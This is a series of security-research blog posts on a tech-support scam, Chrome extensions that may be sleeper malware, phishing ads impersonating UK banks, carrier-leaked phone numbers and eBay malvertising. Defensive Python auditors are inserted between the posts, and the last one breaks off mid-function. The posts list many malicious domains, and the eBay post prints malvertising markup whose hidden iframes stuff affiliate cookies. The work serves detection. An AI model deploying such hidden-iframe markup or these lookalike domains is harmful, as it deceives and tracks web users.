Lenovo P2 phone: which microphones are used?

Simple.. which microphones are used on the Lenovo P2 phone?

On a call: The one on the bottom left of the phone edge, down and to the left of the home button.

When on speakerphone: The one at the top edge of the phone.

Voice Recorder (by Splend Apps): The one on the bottom left of the phone edge, down and to the left of the home button.

Recording a video using inbuilt app or Open Camera: The one on the bottom left of the phone edge, down and to the left of the home button and the one at the top edge of the phone. The top microphone is the left audio channel and the bottom left microphone is the right audio channel. (Possibly reversed depending on orientation of the phone I guess).

Lenovo_P2_Grey

Modified original picture of phone by Rajat491 – CC BY-SA 4.0, https://en.wikipedia.org/w/index.php?curid=53211368


www.help87.com tech support scam (01245785847)

A cold call came into a land line in a plant room while I happened to be in there.

The line being called is not published anywhere and is only there to host broadband. There is no “leak” of info here, just some spammy autodialler.

Initially an Indian lady claimed she was calling from BT and that the connection was sending viruses. Then when she was sure I was “hooked” as a victim she transferred me to an Indian guy.

Sadly as I was in a plant room and on a standard land line phone I couldn’t record the call. I did have access to a virtual machine.

They initially attempted to get me to go to help87.com (which for some reason on the connection I was on would not load).

Then when that failed they got me to use the SupRemo remote software. Again, as I was on-site at a job I spent about 50 minutes trolling them along but had to give up in the end. We didn’t get to the payment stage.

Once the scammer was connected he tried to use the W3C validator (again, a site that wasn’t loading for some reason) and when that failed he used the “tree” command in DOS to claim that the system was scanning and cleaning viruses.

The only things I have to go on are the initial domain he tried to use:

help87.com

and the phone caller ID: 01245785847 (aka. +441245785847 or “01245 785 847” / “01245 785847”) in the UK. (Possibly also related “02059837401”)

The phone number doesn’t lead anywhere other than a few other people complaining about scam calls.

Let’s focus on the domain. There are two references to threatexpert reports. Sadly it looks like Symantec have eaten threatexpert and have taken down their free public reports.

The only remaining thing I can go on is the IP, 107.180.9.83, which resolves to a GoDaddy IP “ip-107-180-9-83.ip.secureserver.net”.

I don’t think this is a shared server. It looks like a private dedicated or virtual dedicated. The SSL certificate on it references “softwaretweak.co”, “akick.com” and “akickoptimizer.com”. The akick site seems to sell lots of badly written software including “PC Booster” type software.

If you go to buy the software on that site it takes you to a non-secure form that asks for credit card details!

akick not pci compliant.png

They also claim to be Microsoft Gold partners but the link to verify doesn’t work.

Upon digging around some more it seems there may be a reason why they are no longer a Microsoft Gold partner!
1) Their PC Doctor software is listed as malware by Microsoft: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Rogue:MSIL/Rustliver&ThreatID=223709

The Microsoft page above ties it all together too. They reference gattsupport.com (hosted on a different server within the same IP range) which has the same domain registration of technocaretechnology.com!
abhishek.semm@technocaretechnology.com
H-68, Sector-63
City Noida
State Uttar Pradesh
Postal 201307
Country INDIA
Phone 919654796904

The original IP once had a domain gattsupportcom.com pointing at it.

2) They’ve been posting on the Microsoft forums on how to “get [their antivirus] listed in windows security center”: here and here.

Another likely link tying them together is two more domains on the same IP, technocaretechnology.com and gatechnocaretechnology.com, which seem to do outsourced phone support and other business processes.

Other domains on the same server that have no content:

kristechllc.com

In summary: It is my opinion that this company is a scam and that, in their downtime, they cold call people to attempt to get them to pay for services or products that they don’t need. Certainly they use the standard Event Viewer “scare” tactics and lie about the reason for the call.


Google Chrome Extensions hiding and waiting?

Update 2018-06-25: Looks like Google have removed at least two of the suspicious extensions from the Chrome Store.. one still remains online.
junkextension contains malware

I’ve seen a strange advert around the internet recently .. sadly I don’t have a screenshot of the advert but it was claiming that I could click on it to get maps and directions.

Upon clicking on it via the advert you see a page relating to map directions:

vomesq

However on the second visit to the advert page if you don’t go via the advert and have cleared your cookies you get a very different page:

hiding extension title on second visit

Already suspicious.. why offer a “mapping” extension which is titled “Slideshow” and then why hide the mapping part of it if someone visits the site without going via the advert?

Clicking any of the elements on the page prompts you to install suspiciously named Google Chrome extensions. Such as:

Tetsop Slideshow with horses
Vomesq Slideshow with four seasons
Ustif slideshow with Rainbow
Klastaf Slideshow with four seasons

tetsop

So, you install the extension.. and nothing useful happens. You don’t get driving directions but you do get horse pictures or other rotating GIF pictures inserted into the Google home page (as shown in the extension screenshot). At the time of the screenshot above the extension had 12,000 users; as of the time of writing it has 14,000 users.

The extension has the ability to modify absolutely any web page the user visits. At the time of writing it does not appear to be doing anything malicious.. the sites it regex-matches against are Google domains..
Upon visiting a Google home page it fetches some code from the extension’s host domain. At the moment this is just GIFs, which it then injects into the page.
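
The combination described above (a content script that may run on every page, fetching code from a domain the developer controls) is exactly what a manifest review is meant to catch. The script below is an added example, not code from the post or from the extensions it describes: it audits a constructed manifest.json for broad host access, content scripts matched to every origin, and a manifest CSP that whitelists a remote script source. Both manifests and the data1.example-host.invalid hostname are made up for the example.

```python
import json
import re

# Constructed sample manifests (not taken from the extensions in the post).
# BROAD_MANIFEST models what the post describes: a content script that may
# run on every page the user visits, plus a remote host the extension may
# pull script from. NARROW_MANIFEST is the same extension limited to the
# Google home pages it actually claims to decorate.
BROAD_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Slideshow with horses",
    "version": "1.0",
    "permissions": ["<all_urls>", "storage"],
    "content_scripts": [{
        "matches": ["http://*/*", "https://*/*"],
        "js": ["inject.js"],
        "run_at": "document_end",
    }],
    # hypothetical host; the real extensions used data1.<name>.com domains
    "content_security_policy":
        "script-src 'self' https://data1.example-host.invalid; object-src 'self'",
})

NARROW_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Slideshow with horses",
    "version": "1.0",
    "permissions": ["storage"],
    "content_scripts": [{
        "matches": ["https://www.google.com/", "https://www.google.co.uk/"],
        "js": ["inject.js"],
    }],
})

# Match patterns that grant access to every origin.
BROAD_PATTERN = re.compile(r"^(<all_urls>|\*://\*/\*|https?://\*/\*)$")


def audit_manifest(manifest_text):
    """Return a list of human-readable findings for an extension manifest."""
    m = json.loads(manifest_text)
    findings = []

    # 1. Host access: MV2 puts host patterns in "permissions", MV3 in "host_permissions".
    for p in m.get("permissions", []) + m.get("host_permissions", []):
        if BROAD_PATTERN.match(p):
            findings.append(f"broad host permission: {p}")

    # 2. Content scripts: a match of every origin means the script runs on every page.
    for cs in m.get("content_scripts", []):
        for pat in cs.get("matches", []):
            if BROAD_PATTERN.match(pat):
                findings.append(f"content script {cs.get('js')} runs on every page ({pat})")

    # 3. Remote script sources: MV2 lets a manifest CSP whitelist https origins for
    #    script-src, so the extension's behaviour can change server-side without
    #    a new version going through the store review.
    csp = m.get("content_security_policy", "")
    if isinstance(csp, str):
        directive = re.search(r"script-src([^;]*)", csp)
        if directive:
            for src in directive.group(1).split():
                if src.startswith("http"):
                    findings.append(f"remote script source allowed: {src}")
    return findings


if __name__ == "__main__":
    for name, text in [("broad", BROAD_MANIFEST), ("narrow", NARROW_MANIFEST)]:
        print(name, audit_manifest(text) or "no findings")
```

The point of the narrow manifest is that an extension whose only claimed job is decorating the Google home page has no reason to match every origin; when the matches and the description disagree, that gap is the finding, whatever the content script happens to inject today.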

What is the point? Someone is spending $$ on advert clicks to install a Chrome extension that doesn’t do anything related to the claims in the advert.

It almost seems like they are gathering a user base and will sell? or change? the Chrome Extension in the future to do something malicious or unintended.

Domains relating to this:
data1.vomesq.com
data1.tetsop.com
data1.ustif.com
data1.klastaf.com
natofo.com
travispa.com
onsevino.com
mixoum.com
toutravi.com
amoindi.com
resolve
data1.ustif.com
data1.open-dog.com
data1.gestona.com
data1.iti-maps.fr
data1.mareps.com
data1.teryom.com
data1.estracep.com
data1.imastifi.com
data1.lorelam.com
data1.meu-imc.com
data1.lolaji.com
data1.jounyl.com
data1.selbamo.com
data1.losimt.com
data1.ubersetzung-app.com
data1.anastras.com
data1.barbuna.com
data1.imc-peso.com
data1.ludimaro.com
data1.repossot.com
data1.noesla.com
data1.visoum.com
data1.rosalop.com
data1.exatrom.com
data1.onolli.com
data1.phistouquet.com
data1.felinao.com
data1.iginot.com
data1.makiloy.com
data1.futeala.com
data1.besinaf.com
data1.proufta.com
data1.pintoula.com
data1.nadasto.com
data1.mein-bmi.com
data1.qopletr.com
data1.toumina.com
data1.trumaeo.com
data1.ma-direction.com
data1.fertoul.com
data1.sopreni.com
data1.klastaf.com
data1.bmi-result.com
data1.chrchaimoua.com
data1.swapagg.com
data1.aligoram.com
data1.inadoul.com
data1.sollmia.com
data1.pictdog.com
data1.road-maps.fr
ip20.ip-91-121-54.eu
data1.scopich.com
data1.myloap.com
data1.platoks.com
data1.tetsop.com
data1.sabrelpt.com
data1.routenplaner-karten.com
data1.slimness.fr
data1.stoploco.com
data1.janomirg.com
data1.papsinim.com
data1.sabuf.com
data1.vomesq.com
data1.calcolo-bmi.com
data1.esiliq.com
data1.zargu.com
data1.eurosty.com
data1.noegate.com
data1.bicelou.com
data1.quotient-retraite.fr
data1.greskof.com
data1.bmi-tw.com
data1.maulou.com
data1.gorgiia.com
data1.chutalop.com
data1.quizdoamor.com
data1.oomatie.com
data1.cholty.com
data1.pomrolo.com
data1.point-meteo.fr
data1.recalomoy.com
data1.hyjouco.com
data1.roterf.com
data1.elixet.com
data1.consimis.com
data1.formulapeso.com
data1.saumaf.com
data1.cloakyz.com
data1.my-ideal-weight.com
data1.bmi-berech.com
data1.compasou.com
data1.qibizar.com
data1.poulixo.com
data1.perfect-imc.com
data1.modalas.com
data1.debozoiz.com
data1.mio-percorso.com
data1.plopatic.com
data1.carazouco.com
data1.strasscom.com
data1.frumaa.com
data1.solkyl.com
data1.zoobre.com
data1.rydima.com
data1.monstegou.com
data1.plifacil.com
data1.serlaz.com
data1.stoumo.com
data1.recettes-en-ligne.eu
data1.lettres.net
data1.trouvayca.com
data1.toustestests.com
data1.liloust.com
data1.pasruma.com
data1.lovincalculator.com
data1.stenap.com
data1.ablapol.com
data1.wikimot.fr
data1.olleap.com
data1.macoulpa.com
data1.mes-resultats.com
data1.astrolignes.com
data1.tests-moi.com
data1.dermabeauty.fr
data1.imc-calcular.com
data1.zunelrish.com
data1.kodamil.com
data1.yetras.com
data1.qhirta.com
data1.ruta-mapa.com
data1.eferif.com
data1.javelas.com
data1.ujdilon.com
data1.eneude.com
data1.shakkly.com
data1.bipoel.com
data1.nedolla.com
data1.quizdeamor.com
data1.tramolol.com
data1.kismuta.com
data1.tatoflex.com
data1.iglere.com
data1.roblaprouf.com
data1.grilsta.com
data1.gelupi.com
data1.logmati.com
data1.gopilou.com
data1.ohquizz.com
data1.uclat.com
data1.pronzal.com
data1.dom-app.com
data1.trajets-cartes.com
data1.blamap.com
data1.app-fast.com
data1.annitop.com
data1.nofinaj.com
data1.raepdi.com
data1.calcolo-imc.com
data1.clibar.com
data1.stuana.com
data1.meluli.com
data1.metoun.com
data1.rlicte.com
data1.my-drivingdirections.com
data1.phonalo.com
data1.seconnecter-ici.com
data1.sjilota.com
data1.tyhfepa.com
data1.cloumapco.com
data1.flomaga.com
data1.glicalol.com
data1.noxip.com
data1.gimoli.com
data1.modlat.com
data1.mimaloy.com
data1.manulap.com
data1.cichalou.com
data1.villonat.com
data1.sqadipt.com
data1.iblep.com
data1.slopap.com
data1.stropemer.com
data1.chloki.com
data1.bimwal.com
data1.vlouma.com
data1.satinat.com
data1.apps-italia.com
data1.bezadi.com
data1.samalag.com
data1.lolipt.com
data1.dailyforme.com
data1.start-bmi.com
data1.snarwin.com
data1.ahnat.com
data1.miazuz.com
data1.isobiv.com
data1.atoleg.com
data1.elplic.com
data1.ygivas.com
data1.gripoal.com
data1.klepst.com
data1.manipo.com
data1.luchil.com
data1.soqano.com
data1.baldoun.com
data1.troplip.com
data1.donasip.com
data1.solisoll.com
data1.satouna.com
data1.ortisul.com
data1.avortep.com
data1.stravit.com
data1.grexlip.com
data1.haverto.com
data1.blikux.com
data1.masowe.com
data1.slimya.com
data1.nistada.com
data1.lapretofe.com
data1.depemel.com
data1.sotella.com
data1.ofarnut.com
data1.peso-altezza.com
data1.pocket-rezept.com
data1.routen-karten.com
data1.open-cat.com
data1.meoust.com
data1.allastin.com
data1.naliora.com
data1.slapapi.com
data1.boulass.com
data1.mestaf.com
data1.routenweb.com
data1.recettes.net
data1.les-pages.com
data1.yummmi.es

Strings relating to this:
/plug-post-install.php
my-drivingdirections
partners/plugins/openanigif/openvomesq-data.php
partners/plugins/openanigif/opentetsop-data.php
partners/plugins/openanigif/open-regexps.php
update-version.php


Phishing using Google Adwords / Adsense

Today while searching for a UK Bank Google offered me an advert.

The advert looks very unclear and I expect most “normal” people searching will click on it thinking it is the genuine website.

metrobank phishing mbinternetaccountant org.png
Note: The top “Ad” entry is the phishing link!

So… is Google dumb enough to allow this? It seems so!

You click on it.. spot the difference.

metrobank phishing mbinternetaccountant org fake site
vs
metrobank genuine site

Google are allowing a phishing site to advertise on keywords for a UK bank!

To make identification of this site more difficult it seems that if you visit the site without Google as the HTTP referer you get either a 404.. or a website that looks like it is for an accountancy practice.

metrobank phishing mbinternetaccountant org with no google referer

Poor show.. time to report the advert to Google.

However it looks like it isn’t the first time. I can find similar names that have likely been used for the same scam:

hsbcsaving.info – HSBC Bank phishing site
tsbinternet.info – UK Bank; TSB phishing site
tsbinternetsavings.org – UK Bank; TSB phishing site
tsbinternetaccounts.org – UK Bank; TSB phishing site
cbonline.live – Clydesdale Bank phishing site
cbonllne.group – Clydesdale Bank phishing site
cbonlive.group – Clydesdale Bank phishing site
cbonline.online – Clydesdale Bank phishing site
clydesdaleco.xyz – Clydesdale Bank phishing site
cbinternetacc.site – Clydesdale Bank phishing site
cbinternetaccountants.xyz – Clydesdale Bank phishing site
cbonlineaccount.info – Clydesdale Bank phishing site
cbolines.online – Clydesdale Bank phishing site
chasesavingsacc.com – US bank “Chase” phishing site

cbonlinesaver.info – Clydesdale Bank phishing site
cbonlinesaveracc.info – Clydesdale Bank phishing site
cbinternetacc.xyz – Clydesdale Bank phishing site
ntwestm.info – UK Bank NatWest phishing site
personalnatwst.info – UK Bank NatWest phishing site

ylbonline.ltd – Yorkshire Bank phishing site
ybonlline.com – Yorkshire Bank phishing site
ybonlinesavings.xyz – Yorkshire Bank phishing site
ybonllne.systems – Yorkshire Bank phishing site
ylbonline.systems – Yorkshire Bank phishing site
yrkbonline.xyz – Unknown
ysbonline.info – Unknown
mbinternetaccountant.org – Metro Bank phishing site
mbinternetaccountants.org – Metro Bank phishing site
mbonlinesavings.info – Metro Bank phishing site
mbinternetsaver.com – Metro Bank phishing site
mbinternetaccs.info – Metro Bank phishing site
metrobankinternt.info – Metro Bank phishing site
metrobankinternet.com – Metro Bank phishing site
mbinternetsavings.com – Metro Bank phishing site
mbsavingsacc.info – Metro Bank phishing site
mbonlinehome.info – Metro Bank phishing site
mbinternetsaving.com – Metro Bank phishing site
mbinternt.info – Metro Bank phishing site
mbiinternet.org – Metro Bank phishing site
mbinternetaccount.xyz – Metro Bank phishing site
mtrbonline.info – Metro Bank phishing site
metrbonline.info – Metro Bank phishing site

rbspersonal.xyz – Royal Bank of Scotland phishing site
postoffc.com – UK Bank Post Office phishing site
pstofficeacc.xyz – UK Bank Post Office phishing site
pstoffcsavingsacc.info – UK Bank Post Office phishing site

Most are hosted at “45.76.210.134” (45.76.210.134.vultr.com).
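
The names in the list above share a small number of tricks: a bank name or its abbreviation, a banking word such as “internet”, “savings” or “acc”, a swapped letter (cbonllne, ybonlline, ntwestm) and a cheap TLD. The scorer below is an added example, not the post’s own tooling: it normalises the common letter swaps, finds brand tokens with up to one edit (a small Sellers edit-distance routine), and grades each domain as likely, possible or none. The brand and word lists are my own choices for the banks named above; the two benign domains at the end of SAMPLE_DOMAINS are constructed to show the negative case.

```python
# Brand tokens for the banks named in the list above (plus Chase), including the
# abbreviations the lookalikes use. Tokens of up to three characters are only
# matched as a prefix of the domain label; four- and five-character tokens must
# appear exactly; longer tokens may appear with one edit (ntwest, natwst, pstoffice).
BRANDS = ["metrobank", "natwest", "clydesdale", "yorkshire", "postoffice",
          "hsbc", "chase", "tsb", "rbs", "cb", "mb", "yb"]
BANKING_WORDS = ["online", "internet", "saving", "saver", "account", "acc",
                 "personal", "login", "secure"]
CHEAP_TLDS = {"xyz", "info", "live", "group", "online", "site", "systems", "ltd", "top"}

# Collapse the letter substitutions seen in the list (cbonllne, ybonlline, ...)
# so that "online" and "onllne" compare equal.
HOMOGLYPHS = str.maketrans({"l": "i", "1": "i", "0": "o", "-": ""})

# A handful of domains copied from the list above, plus two constructed
# benign names (not from the post) to show the negative case.
SAMPLE_DOMAINS = [
    "cbonllne.group", "ntwestm.info", "mbinternetaccountant.org",
    "chasesavingsacc.com", "yrkbonline.xyz",
    "example-plumbing.co.uk", "mbsoftware.com",
]


def normalise(label):
    return label.lower().translate(HOMOGLYPHS)


def min_edit_substring(pattern, text):
    """Smallest Levenshtein distance between `pattern` and any substring of `text` (Sellers)."""
    prev = [0] * (len(text) + 1)
    for i, pc in enumerate(pattern, 1):
        cur = [i] + [0] * len(text)
        for j, tc in enumerate(text, 1):
            cur[j] = min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (pc != tc))
        prev = cur
    return min(prev)


def assess(domain):
    """Grade one domain: a brand hit plus a banking word or cheap TLD is 'likely'."""
    parts = domain.lower().split(".")
    label, tld = parts[0], parts[-1]
    norm = normalise(label)
    reasons = []
    for brand in BRANDS:
        nb = normalise(brand)
        if len(brand) <= 3:
            hit = norm.startswith(nb)
        elif len(brand) <= 5:
            hit = nb in norm
        else:
            hit = min_edit_substring(nb, norm) <= 1
        if hit:
            reasons.append("brand:" + brand)
    words = [w for w in BANKING_WORDS if normalise(w) in norm]
    reasons += ["word:" + w for w in words]
    cheap = tld in CHEAP_TLDS
    if cheap:
        reasons.append("tld:" + tld)
    has_brand = any(r.startswith("brand:") for r in reasons)
    if has_brand and (words or cheap):
        verdict = "likely"
    elif words and cheap:
        verdict = "possible"
    else:
        verdict = "none"
    return {"domain": domain, "verdict": verdict, "reasons": reasons}


def triage(domains):
    return {d: assess(d)["verdict"] for d in domains}


if __name__ == "__main__":
    for d in SAMPLE_DOMAINS:
        r = assess(d)
        print(f"{d:28} {r['verdict']:9} {' '.join(r['reasons'])}")
```

A brand token on its own is deliberately not enough (mbsoftware.com stays at “none”), and the one-edit rule is only applied to tokens of six letters or more so that short abbreviations cannot fuzzy-match random words. It is a triage heuristic for a list like the one above, not a blocklist; anything it grades “likely” still needs the page itself looked at, as the post does with the Google referer check.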


The curious time an advert knows your mobile phone number..

Sorry for the length of this article.. there are so many different parts to this that it is difficult keeping a single sensible train of thought.

I don’t know my mobile number, I don’t use it for calls or texts. It is a SIM I use just for data alone. No Google, Microsoft or any other account has my mobile number.

While browsing a weather website today over 3G on my mobile phone I saw an advert.

Screenshot_20180510-203054

Fine.. so what.. an advert.. This one was for “MobiPlanet” (see screenshot top right); the thing that intrigued me about it was the advert touted FlappyBird – as a Subscription. I was interested how they were doing this along with a “free trial”.

Upon clicking the advert I was taken to a screen similar to this one (see screenshot on left):

Screenshot_20180511-121836

Except the first time I visited it – it didn’t have the mobile number input prompt. This was missing and only the “Subscribe Now” option existed (see photo to the right).
vlcsnap-2018-05-20-13h23m02s141

Stupidly – and thinking that there was no way my browser on my mobile phone was leaking my phone number.. I clicked Subscribe now. To my astonishment I got a text message and was subscribed to the service. No phone number input, no “text back to confirm” feedback loop.

Just instantly subscribed. How! How the heck does a website know my mobile number without me ever inputting it into _anything_.

With a bit of collaboration with a person called “therioman” they confirmed that the same issue affects the 3 other major UK network providers. (O2, Vodafone and EE).
therioman has (very kindly, thank you!) made a video of this happening:

Screenshot_20180511-175909

I’m quite angry at this in the first place. I’ve since spent many hours reproducing the “problem”. Lots of tricks are employed to prevent you seeing the same sign-up form again; further visits ask you to type in your number.

I can find what I believe to be the API or service that reported my phone number to the advertiser.

Roll in IMI Mobile (“imimobile.net”)!

My reasoning for thinking it is them is… They are the only likely party with access to the cell networks’ customer data. Business relationships get built.. then API access or customer databases get abused.

Remember.. I don’t know my mobile number and I don’t have it associated with anything. The only thing that knows my mobile number is my password vault and my mobile provider, called “Three”, themselves.

So how can an advertiser get my mobile number from just me browsing around?

The most likely cause is IMI Mobile having a “special deal” with the major UK cell networks.. Three and the other networks have probably set up an intercepting proxy for requests to some IMI Mobile domains and subdomains where the subscriber number is injected into an HTTP header. From this IMI Mobile can tell which subscriber is accessing their service and can then pass it on to the advertiser.

The specific requests which do this, I believe, are unusual requests from the advertiser site pointing to a JavaScript file at IMI Mobile. However, these _all_ return a 0-byte (empty) file. E.g.:

http://pfi.imimobile.net/identify/bbaba4b7-4b22-4c2a-a875-3ba755dde0a7/verify.js
http://pfi.imimobile.net/identify/6e688090-0d93-4c86-bbc0-2cf84730e593/verify.js
http://pfi.imimobile.net/identify/8681162f-f946-43ad-957b-11a4b767162f/verify.js
http://pfi.imimobile.net/identify/9501bcd0-66ce-4f4c-8f2a-49c8889bc8a4/verify.js
http://pfi.imimobile.net/identify/ab1aa5b0-a429-4180-83b9-fbcc58a575e1/verify.js

It is my belief that the /identify/ request, tagged with a GUID, is sent from your mobile browser to IMI Mobile. IMI Mobile receive the request at their end along with the mobile phone number or subscriber details injected by the mobile network.

They then, in the background, pass this information back to the advertiser (probably by the advertiser requesting another back end API asking for details about the GUID). The advertiser can then subscribe you or use your mobile phone number in any way they please.
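
Two properties of the requests listed above make them detectable from the browser side without any knowledge of what the network adds: they go over plain HTTP (a proxy in the mobile network can only read and add headers on cleartext traffic; a TLS request cannot be enriched in transit), and the response is empty, so the request itself is the payload. The script below is an added example, not the post’s own tooling: it scans a constructed resource log of (url, status, bytes) tuples, as a devtools HAR export or proxy log would give it, for the /identify/<GUID>/verify.js shape and records those two properties per hit. The first URL is the one quoted in the post; the *.invalid hosts are placeholders.

```python
import re
from urllib.parse import urlparse

# A GUID as seen in the verify.js paths quoted in the post.
GUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
IDENTIFY_PATH = re.compile(rf"^/identify/({GUID})/verify\.js$", re.IGNORECASE)

# Constructed resource log in (url, status, response_bytes) form. The first
# URL is the one quoted in the post; the other hosts are made-up placeholders.
SAMPLE_LOG = [
    ("http://pfi.imimobile.net/identify/bbaba4b7-4b22-4c2a-a875-3ba755dde0a7/verify.js", 200, 0),
    ("https://cdn.weather-site.invalid/app.js", 200, 48213),
    ("http://pfi.subscribe-site.invalid/identify/6e688090-0d93-4c86-bbc0-2cf84730e593/verify.js", 200, 0),
    ("https://pfi.imimobile.net/identify/8681162f-f946-43ad-957b-11a4b767162f/verify.js", 200, 0),
    ("http://img.weather-site.invalid/logo.png", 200, 1234),
]


def flag_identify_beacons(entries, page_host):
    """Return one record per request whose path looks like an identify beacon."""
    hits = []
    for url, status, size in entries:
        u = urlparse(url)
        m = IDENTIFY_PATH.match(u.path)
        if not m:
            continue
        hits.append({
            "host": u.hostname,
            "guid": m.group(1).lower(),
            "third_party": u.hostname != page_host,
            # A proxy in the mobile network can only read and add headers on
            # cleartext HTTP; a TLS request cannot be enriched in transit.
            "cleartext": u.scheme == "http",
            # The post notes every such script is 0 bytes: the response carries
            # no code, the request itself is the payload.
            "empty_body": status == 200 and size == 0,
        })
    return hits


def high_confidence(hits):
    """Beacons that are third-party, cleartext and empty: the full pattern from the post."""
    return [h for h in hits if h["third_party"] and h["cleartext"] and h["empty_body"]]


if __name__ == "__main__":
    found = flag_identify_beacons(SAMPLE_LOG, "www.weather-site.invalid")
    for h in found:
        print(h)
    print(len(high_confidence(found)), "high-confidence beacon(s)")
```

The HTTPS entry is reported but not graded high-confidence, because over TLS the network operator has no way to add a header; which is also the practical mitigation on the handset side (an HTTPS-only mode, or blocking cleartext requests to third parties) while the carrier arrangement itself is the thing that needs to go away.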


Reproduction.

On most UK mobile networks.. and especially Three.. visit weather underground and look at the weather for a location. If you see an advert for a subscription service.. click on it.

I expect the first time you visit that advert you won’t be prompted for your mobile number. You will just see a subscribe button. Any subsequent visits will probably show you a prompt to fill in your mobile number.

See the YouTube video further up the post for one user’s experience.

Notes
IMI Mobile partners have been naughty in the past with subscription SMS services.
https://psauthority.org.uk/-/media/Files/PhonepayPlus/Adjudications/0001Tribunal_decisions/2016/Tribunal-minutes-72402.ashx
https://psauthority.org.uk/-/media/Files/PhonepayPlus/Adjudications/0001Tribunal_decisions/72152-Tribunal-Minutes-022016.ashx
https://psauthority.org.uk/-/media/Files/PhonepayPlus/Adjudications/0001Tribunal_decisions/71968–Tribunal-Minutes-022016.ashx

Related indicators.

Google Tag Manager: AW-833104379, GTM-59M4Z8S, AW-848165185

Hosts: i.uk.freetrialclub.co.uk, pfi.imimobile.net, freetrialclub.co.uk, streamsharp.com, app.sb7icat.com

I also believe that “nuyoo.club”, “pfi.nuyoo.club” and “joinbodyin8.com” are similar sites that employ the same “knows your number” trick. They send requests to the imimobile hosts as well.

Also related but not seen in this incident is “api-in.taptobill.com” which has some association with IMImobile. However the tap2bill name appears on a portal called “PFI Admin” at http://mobilepayments.imimobile.net/ .

Other domains that have previously been seen to call in scripts from the IMIMobile domain and could potentially have also been doing the same “no number to enter or feedback loop” subscription:

pfi.69vidsbox.com
pfi.pornfortress.com
pfi.69camsbox.com
pfi.69vidbox.com
http://www.books4you.zone
http://www.globalcams.world
enter.playboy.vids4u.mobi
http://www.fitmate.tv
http://www.gifstickers.world
http://www.classicmovies.zone
http://www.listen2books.zone
pfi.loadedgames.co.uk
pfi.dailydieters.com
pfi.playpuzzles.fun
i.uk.mymobiplanet.com
i.getmefit.mobi
enter.pb.vids4u.mobi
pfi.footy-tipsters.com
http://www.topwallpapers.club
http://www.mobgames.club
i.uk.freetrialclub.co.uk
pfi.nuyoo.co
pfi.loadedmobi.com
i.free24.co.uk
msplash-uk.fun-mobile.co.uk
msplash2-uk.fun-mobile.co.uk
pfi.gameclub365.com
http://www.hdwallpapers.shop
http://www.zapwin.com
pfi.thewinme.co.uk
pfi.smashvids.com
pfi.crazywin.co.uk
http://www.bigwintoday.com
http://www.hornyvip.com
uk.clubvoucher.co.uk
http://www.xxxvidsuk.com
uk.quiz2win.mobi
i.x-stream2.co.uk
http://www.crazywin.co.uk
tj.reporo.com


eBay: zaful advert playing music automatically (another d.willvox.com malicious advert)

As a follow on from last month where gamiss.com was hijacking eBay pages.. this month it is zaful.com.

This time the visitors don’t get hijacked away from eBay but they do get music playing at them in the background while they are on eBay pages.

The advert causing this looks like:

ebay advert playing music.png

The chain of requests goes like this.

You visit an item on eBay (and probably many of the other pages too).

This has, among many others, an iFrame that fetches from:

https://ir.ebaystatic.com/cr/v/c1/x-frame-4.html

Which then runs some JavaScript to show an advert: function showAd()

This triggers a request to image3.pubmatic.com which is a legitimate advertising network. This responds with:

https://tags.mathtag.com/notify/js?exch=pub&id=REDACTED&sid=3049544&cid=5455548&nodeid=1135&price=0.08&group=eu&auctionid=2004222052992160077&bp=a_aiaaaa&3pck=REDACTED

Interesting to see the price paid in the URL! Mathtag seems to be where things go wrong (as it did last month too). Mathtag respond with some javascript that sends users onto:

https://d.willvox.com (also used in last months page hijacking).

This malicious website then responds with the advert code:

<div><a href="https://www.zaful.com/" target="_blank"><img src="https://d.willvox.com/ad/zaful.jpg" height="90" width="725"></a>
<img width="300" height="250" src="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600&amp;af=https://ebayadvertising.co.uk/&amp;cn=3049544&amp;cv=5455548&amp;dp=5956238474928068609" style="display:none;">
<iframe src="https://www.gearbest.com/promotion-8-march-special-1216.html?lkid=13364449" style="display: none"></iframe>
<iframe src="https://www.zaful.com/m-promotion-active-valentines-sale.html?innerid=35&amp;lkid=13266105" style="display:none"></iframe>
<iframe src="https://www.gamiss.com/?lkid=13368106" style="display: none" sandbox="allow-scripts allow-same-origin allow-top-navigation-by-user-activation"></iframe>
<iframe src="https://www.rosegal.com/promotion-christmas-sale.html?lkid=12369082" style="display:none"></iframe></div>

Job done! While trying to pollute the eBay visitor with referral-code tracking for gamiss, zaful, rosegal, gearbest and aliexpress, the zaful page embedded within the advert then has a further embedded YouTube video that plays music!
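
The markup above is small enough to audit mechanically, which is what a publisher’s creative-scanning step should be doing. The script below is an added example (not code from the post, eBay or any of the ad networks named): it feeds the quoted advert HTML through Python’s html.parser, records every iframe, image and link with its host, whether it is hidden with display:none, any lkid affiliate parameter, and whether a frame carries a sandbox attribute. Only the markup quoted in the post is used as input.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# The advert markup quoted above, verbatim.
AD_HTML = """<div><a href="https://www.zaful.com/" target="_blank"><img src="https://d.willvox.com/ad/zaful.jpg" height="90" width="725"></a>
<img width="300" height="250" src="http://s.click.aliexpress.com/e/JuvRrzb?bz=120*600&amp;af=https://ebayadvertising.co.uk/&amp;cn=3049544&amp;cv=5455548&amp;dp=5956238474928068609" style="display:none;">
<iframe src="https://www.gearbest.com/promotion-8-march-special-1216.html?lkid=13364449" style="display: none"></iframe>
<iframe src="https://www.zaful.com/m-promotion-active-valentines-sale.html?innerid=35&amp;lkid=13266105" style="display:none"></iframe>
<iframe src="https://www.gamiss.com/?lkid=13368106" style="display: none" sandbox="allow-scripts allow-same-origin allow-top-navigation-by-user-activation"></iframe>
<iframe src="https://www.rosegal.com/promotion-christmas-sale.html?lkid=12369082" style="display:none"></iframe></div>"""


class AdAuditor(HTMLParser):
    """Collects every element in the creative that loads a third-party resource."""

    def __init__(self):
        super().__init__()
        self.elements = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "img", "a"):
            return
        a = dict(attrs)  # html.parser has already unescaped &amp; in the values
        target = a.get("href") if tag == "a" else a.get("src")
        u = urlparse(target or "")
        style = (a.get("style") or "").replace(" ", "").lower()
        self.elements.append({
            "tag": tag,
            "host": u.hostname,
            "hidden": "display:none" in style,
            "affiliate_id": parse_qs(u.query).get("lkid", [None])[0],
            "sandbox": a.get("sandbox"),
        })


def audit_ad(html):
    p = AdAuditor()
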